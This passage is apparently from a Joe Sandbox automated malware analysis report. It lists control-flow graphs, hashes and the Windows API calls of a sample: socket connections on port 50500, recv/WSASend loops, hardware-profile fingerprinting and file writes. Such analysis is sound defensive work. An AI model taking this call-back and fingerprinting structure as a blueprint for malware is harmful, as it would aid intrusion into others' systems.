                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2234911746-650681566
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: cb57bf31179a4563337c55b44a99fda849dd5b2aa6230865fc7041e297810689
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 81611574D0521EDBCF24CFA4C884AADFBB4FF58315F2586AAD506AB601C3749E81CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 28db60-28db92 WSAStartup 182 28db98-28dbc2 call 277d20 * 2 181->182 183 28dc66-28dc6f 181->183 188 28dbce-28dc14 182->188 189 28dbc4-28dbc8 182->189 191 28dc60-28dc65 188->191 192 28dc16-28dc1c 188->192 189->183 189->188 191->183 193 28dc1e 192->193 194 28dc74-28dc7e 192->194 196 28dc24-28dc38 socket 193->196 194->191 199 28dc80-28dc88 194->199 196->191 198 28dc3a-28dc4a connect 196->198 200 28dc4c-28dc54 closesocket 198->200 201 28dc70 198->201 200->196 202 28dc56-28dc5a 200->202 201->194 202->191
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0028DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
                                    • closesocket.WS2_32(00000000), ref: 0028DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500$`4u
                                    • API String ID: 3098855095-1883443620
                                    • Opcode ID: 174f5230b010d1301cce1b0cc05fd2b4fbca897717d8a0d382bae3951e1254d9
                                    • Instruction ID: 6cb2226766ddce0cb454cd45ce74d96979f895e74c0af58d51b93e5d9776fcdc
                                    • Opcode Fuzzy Hash: 174f5230b010d1301cce1b0cc05fd2b4fbca897717d8a0d382bae3951e1254d9
                                    • Instruction Fuzzy Hash: 8131C1766153456BC6209F289C84B3BB7E5EF89734F005F1EF9A8932E0E37099198792
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 6d75ac4b0fa0e0286ec07f1ccb0f092322cbf1b28ababa86227565d58fa213be
                                    • Instruction ID: e1da9323d75453a8a47dc36b6a7942118c10bc20ccebf439565f0545bba732d4
                                    • Opcode Fuzzy Hash: 6d75ac4b0fa0e0286ec07f1ccb0f092322cbf1b28ababa86227565d58fa213be
                                    • Instruction Fuzzy Hash: C5319EEB30C110BDFE52A5416B50AF7676DE7E6330732A46EF40FD5142F6946A4D6031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 28ec20-28ec58 52 28ec5e 51->52 53 28f0bf-28f0d3 51->53 54 28ec64-28ec6c 52->54 55 28ec6e-28ec94 call 28db60 54->55 56 28eca7-28ecf0 setsockopt recv 54->56 58 28ec99-28eca1 55->58 56->53 61 28ecf6-28ecf9 56->61 58->56 60 28f0aa-28f0b9 Sleep 58->60 60->53 60->54 62 28ecff-28ed53 call 2d8610 recv 61->62 63 28f037-28f053 call 284a90 61->63 71 28ed59-28ed74 recv 62->71 72 28efe4-28eff1 62->72 69 28f09c-28f0a4 Sleep 63->69 70 28f055 63->70 69->60 73 28f05f-28f086 call 28e060 70->73 74 28f057-28f05d 70->74 71->72 75 28ed7a-28edb1 71->75 72->69 77 28eff7-28f003 72->77 80 28f08b-28f097 73->80 74->69 74->73 78 28edb3-28ee11 call 2d8610 recv 75->78 79 28ee14-28ee44 call 2d5d50 75->79 81 28f019-28f023 call 34cf83 77->81 82 28f005-28f013 77->82 78->79 89 28ee4a 79->89 90 28ef64-28efb3 call 28e460 79->90 80->69 81->69 82->81 93 28ee50-28ef5e 89->93 90->72 97 28efb5-28efc4 90->97 93->90 98 28efda-28efe1 call 34cf83 97->98 99 28efc6-28efd4 97->99 98->72 99->98
                                    APIs
                                    • setsockopt.WS2_32(0000037C,0000FFFF,00001006,?,00000008), ref: 0028ECC7
                                    • recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
                                    • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
                                    • recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
                                    • recv.WS2_32(00000000,?,00000008), ref: 0028EE0C
                                      • Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8B
                                      • Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                      • Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
                                      • Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D
                                    • recv.WS2_32(?,00000004,00000008), ref: 0028F033
                                    • Sleep.KERNELBASE(00000001), ref: 0028F09E
                                    • Sleep.KERNELBASE(00000064), ref: 0028F0AC
                                    • __Mtx_unlock.LIBCPMT ref: 0028F211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
                                    • String ID: 50500$t;:
                                    • API String ID: 2930922264-3732158975
                                    • Opcode ID: a440701467b17683e6cee363dc9ec1ef343da2f20baaa8face3f351cb6128665
                                    • Instruction ID: 62f18a2818f03e37c7e57e2c372ef1de44f21383349697dda9d50359d658affc
                                    • Opcode Fuzzy Hash: a440701467b17683e6cee363dc9ec1ef343da2f20baaa8face3f351cb6128665
                                    • Instruction Fuzzy Hash: CBB1DF31D11259CFEB21EFA8CC85BADBBB5FF06300F248219E444AB2D2D7706995CB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 102 28e060-28e0af call 2d5d50 105 28e1d4-28e20a call 2d5bd0 102->105 106 28e0b5-28e0b8 102->106 115 28e238-28e26c call 277d20 105->115 116 28e20c-28e218 105->116 107 28e0c0-28e0e6 106->107 109 28e0f8-28e107 107->109 110 28e0e8-28e0f3 107->110 113 28e109-28e112 109->113 114 28e117-28e123 109->114 112 28e1c7 110->112 118 28e1ca-28e1ce 112->118 113->112 119 28e133-28e13f 114->119 120 28e125-28e12e 114->120 129 28e26e-28e280 115->129 130 28e282-28e28a call 2d8610 115->130 121 28e21a-28e228 116->121 122 28e22e-28e235 call 34cf83 116->122 118->105 118->107 124 28e14c-28e158 119->124 125 28e141-28e14a 119->125 120->112 121->122 126 28e44b call 352220 121->126 122->115 131 28e15a-28e163 124->131 132 28e165-28e171 124->132 125->112 138 28e450-28e455 call 352220 126->138 136 28e28f-28e2e2 call 277d20 * 2 129->136 130->136 131->112 134 28e17e-28e18a 132->134 135 28e173-28e17c 132->135 140 28e18c-28e195 134->140 141 28e197-28e1a3 134->141 135->112 150 28e2e4-28e313 call 277d20 call 34e9e0 136->150 151 28e316-28e32c call 277d20 136->151 140->112 144 28e1b0-28e1b9 141->144 145 28e1a5-28e1ae 141->145 144->118 147 28e1bb-28e1c3 144->147 145->112 147->112 150->151 156 28e332-28e338 151->156 157 28e3b7 151->157 160 28e340-28e36c 156->160 161 28e3bb-28e3c1 157->161 162 28e370-28e37b 160->162 163 28e3eb-28e403 161->163 164 28e3c3-28e3cf 161->164 162->162 169 28e37d-28e3ab WSASend 162->169 167 28e435-28e44a 163->167 168 28e405-28e411 163->168 165 28e3e1-28e3e8 call 34cf83 164->165 166 28e3d1-28e3df 164->166 165->163 166->138 166->165 171 28e42b-28e432 call 34cf83 168->171 172 28e413-28e421 168->172 179 28e3ad-28e3b5 169->179 180 28e425-28e429 169->180 171->167 172->138 174 28e423 172->174 174->171 179->157 179->160 180->161
                                    APIs
                                    • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,003747E8,00000000,00000000,-003A65B0), ref: 0028E3A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Send
                                    • String ID: 131$50500$Ws2_32.dll$\;:$t;:$ta:$;:
                                    • API String ID: 121738739-1419621233
                                    • Opcode ID: cc9e624841466240fb2ebf3310c15c702087db44e20e56563fb4f8281159fcdc
                                    • Instruction ID: 41fa0ada1bc89aaf801854749deb7e91d32252c7f3f14f23856b734b0144baa8
                                    • Opcode Fuzzy Hash: cc9e624841466240fb2ebf3310c15c702087db44e20e56563fb4f8281159fcdc
                                    • Instruction Fuzzy Hash: E5D1EF30E14249DFDF14DFA8CC54BADBBF5AF06300F694258D855AB1D2E7B09886CB91

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ZXaPPR
                                    • API String ID: 0-2639708229
                                    • Opcode ID: d6dc3a519db5f068f535c06063691a7fa742dfb683dfe83ecea775e400c82482
                                    • Instruction ID: 5563f7a7590bce13d9da9b3f96f4e5526179bdffe24439e4f314cb1de79b6b0c
                                    • Opcode Fuzzy Hash: d6dc3a519db5f068f535c06063691a7fa742dfb683dfe83ecea775e400c82482
                                    • Instruction Fuzzy Hash: 255114FB30C210ADFE02A6516B50AFB676DE7D6730732A4AEF40FD6142F2946A4D6131

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4d469bd8fa5aecdf93529749aef287eb3048c0ec8f9e75e9e6f7ef859f17d4e2
                                    • Instruction ID: b922617ee27f1c75e53beb581a180503352104968b1f0b4f6f78bb0fbafe19d8
                                    • Opcode Fuzzy Hash: 4d469bd8fa5aecdf93529749aef287eb3048c0ec8f9e75e9e6f7ef859f17d4e2
                                    • Instruction Fuzzy Hash: 5D51F3FB30D214BDFA02A5416B50AF7676DE7E6330732A46EF40FD6142F2A46A4D6131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 330 4e80a86-4e80a88 331 4e80a8a-4e80ad9 330->331 332 4e80ae2-4e80af0 330->332 335 4e80af2-4e80af6 331->335 334 4e80b1d-4e80b20 332->334 332->335 338 4e80b01-4e80b04 334->338 339 4e80b22 334->339 336 4e80b07-4e80b0c 335->336 340 4e80b24-4e80cb1 call 4e80c47 336->340 338->336 339->340 361 4e80cc9-4e80cd2 GetCurrentHwProfileW 340->361 362 4e80ce2-4e80ed0 call 4e80e36 call 4e80ed5 361->362
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c9d4d1ee3eabeeb8e03e3bc510ea276e5938d887878e83d517ca50a91f8732f1
                                    • Instruction ID: 04b30dfef85f55428e11062d47729f01022a4af4375846c1846269d704003139
                                    • Opcode Fuzzy Hash: c9d4d1ee3eabeeb8e03e3bc510ea276e5938d887878e83d517ca50a91f8732f1
                                    • Instruction Fuzzy Hash: F651E1EB30D110BDFE52A5416B50AFB67ADE7E6330732A46EF40FC6542F2946A8D6031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 389 4e80acd-4e80ad1 390 4e80ad3-4e80cb1 call 4e80c47 389->390 391 4e80a96-4e80ac8 389->391 416 4e80cc9-4e80cd2 GetCurrentHwProfileW 390->416 391->390 417 4e80ce2-4e80ed0 call 4e80e36 call 4e80ed5 416->417
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 24228695799b830c4abd1083bf79d0f9837f3e6c9033b7fb788e72b51d393558
                                    • Instruction ID: 5d19a5bc67b131e1ae1e00d22d4aaefae9dbc14ff2817843d8e537906a0d97c6
                                    • Opcode Fuzzy Hash: 24228695799b830c4abd1083bf79d0f9837f3e6c9033b7fb788e72b51d393558
                                    • Instruction Fuzzy Hash: 5751CFEB30D211ADFE42A5416B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f538dd352969ea41f6be65bf1ffdd2b009fd8b2c2d22299524557fa114c60cbb
                                    • Instruction ID: 5ec6abc7dcb9615784915db6c20b6857fddce54723f9d936ace777636ddf30aa
                                    • Opcode Fuzzy Hash: f538dd352969ea41f6be65bf1ffdd2b009fd8b2c2d22299524557fa114c60cbb
                                    • Instruction Fuzzy Hash: 5B51EEEB30C110BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 91f2bc62835c3c3e90fb82e2ab25b96fdd9a27262f965cb58780bad15ef622c1
                                    • Instruction ID: d91555482dab3c2dd8708c2746b228bf4b47fb6baa5ade84bc63dbb54198fee3
                                    • Opcode Fuzzy Hash: 91f2bc62835c3c3e90fb82e2ab25b96fdd9a27262f965cb58780bad15ef622c1
                                    • Instruction Fuzzy Hash: CD51CEEB30D111BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f4bb9a35f2695678a46cbeb72decc7e1ac4f359daf3109a94c1d828d0ed4df4c
                                    • Instruction ID: b8f2bd331a96789c4c871a97f332738ab7875293ab242fea506e416f4b3c4513
                                    • Opcode Fuzzy Hash: f4bb9a35f2695678a46cbeb72decc7e1ac4f359daf3109a94c1d828d0ed4df4c
                                    • Instruction Fuzzy Hash: 1051EFEB30D110BDFE42A5416B50AFB676DE7E6330732A46EF40FC2142F2946A8D6031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 605 4e80adf-4e80af0 606 4e80b1d-4e80b20 605->606 607 4e80af2-4e80af6 605->607 609 4e80b01-4e80b04 606->609 610 4e80b22 606->610 608 4e80b07-4e80b0c 607->608 611 4e80b24-4e80cb1 call 4e80c47 608->611 609->608 610->611 630 4e80cc9-4e80cd2 GetCurrentHwProfileW 611->630 631 4e80ce2-4e80ed0 call 4e80e36 call 4e80ed5 630->631
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3deeb88ff76392bf109e07df3f1675d79aa948fd890b51727f1c8abccc9b294
                                    • Instruction ID: b3d9ead78411a0c351faece3aaefb0f898f8a956c7f4e3b0ad20e6e1866e1adb
                                    • Opcode Fuzzy Hash: b3deeb88ff76392bf109e07df3f1675d79aa948fd890b51727f1c8abccc9b294
                                    • Instruction Fuzzy Hash: 194101EB30C115BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A4D6031

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 17e31a307c568e3af303397703088aeef36c69b35f3d0a1e6427b228c4b41258
                                    • Instruction ID: b8a8db25d009ecb5894a39e8a671c2f96dbec9d0eee052dbe4bfea72c8eafefc
                                    • Opcode Fuzzy Hash: 17e31a307c568e3af303397703088aeef36c69b35f3d0a1e6427b228c4b41258
                                    • Instruction Fuzzy Hash: FC4122EB30D214BDFE02A5816B50AFB676DE7E6330732A46EF40FD2542F2946A4D6031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 706 4e80b11-4e80b20 708 4e80b01-4e80b0c 706->708 709 4e80b22 706->709 711 4e80b24-4e80cb1 call 4e80c47 708->711 709->711 730 4e80cc9-4e80cd2 GetCurrentHwProfileW 711->730 731 4e80ce2-4e80ed0 call 4e80e36 call 4e80ed5 730->731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62c03a8bab2bab0019d4c6c1fda598e3cd47fab7c65242e6a43f59a69d8ca3a7
                                    • Instruction ID: d1f20d94d11033579aa83b053a73d1458a9d0749481c63ec34b13192b8606c1b
                                    • Opcode Fuzzy Hash: 62c03a8bab2bab0019d4c6c1fda598e3cd47fab7c65242e6a43f59a69d8ca3a7
                                    • Instruction Fuzzy Hash: 4541EFEB30C215ADFE52A5816B50AFB676DE7E6330732A46EF40FC2142F6946A4D6031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 758 4e80bc4-4e80bd2 759 4e80b71-4e80bbf 758->759 760 4e80bd4 758->760 762 4e80bd6-4e80cb1 call 4e80c47 759->762 760->762 776 4e80cc9-4e80cd2 GetCurrentHwProfileW 762->776 777 4e80ce2-4e80ed0 call 4e80e36 call 4e80ed5 776->777
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b2bb2bd9e5ec2f50d63218c09522f73a5e9345d9ed24075e0fa3dad8cb9b6cf
                                    • Instruction ID: dd84e93d361b19f7f40de92ce6fd3c3a0bce40ce72861141f270f852d53668ff
                                    • Opcode Fuzzy Hash: 0b2bb2bd9e5ec2f50d63218c09522f73a5e9345d9ed24075e0fa3dad8cb9b6cf
                                    • Instruction Fuzzy Hash: DD4105FB30D210ADFE42A5516B50AFB676DE7E6330732A46EF40FD6142F2946A4D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: e61a8fb57b02973c8383cb55e191608a4b6e221a5c9bdfc033363097effdcc57
                                    • Instruction ID: 4313fa931d5a0dd3db05098a8ca848e62d8d766552be7255faa9e46430c49425
                                    • Opcode Fuzzy Hash: e61a8fb57b02973c8383cb55e191608a4b6e221a5c9bdfc033363097effdcc57
                                    • Instruction Fuzzy Hash: B94137EB30C210BDFE02A5816B50AFB672DE7E6330732A46EF40FD2142F2942A4D6031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f8ffc0d01df87c05053a09c051e4eef1f40d1024d2e19c59e83dd2e349325f12
                                    • Instruction ID: a02834cf323cd3c5e279f5af99ef288eb028dabacdb4040410ad3e6f2d68b9d7
                                    • Opcode Fuzzy Hash: f8ffc0d01df87c05053a09c051e4eef1f40d1024d2e19c59e83dd2e349325f12
                                    • Instruction Fuzzy Hash: 4641F0EB30D115BDFE42A5416B50AFB676DE7E6330732A46EF40FC2142F6946A8D6031
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00356AF7,?,00000000,00000000,00000000,?,00000000,?,0034C023,00356AF7,00000000,0034C023,?,?), ref: 00363091
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
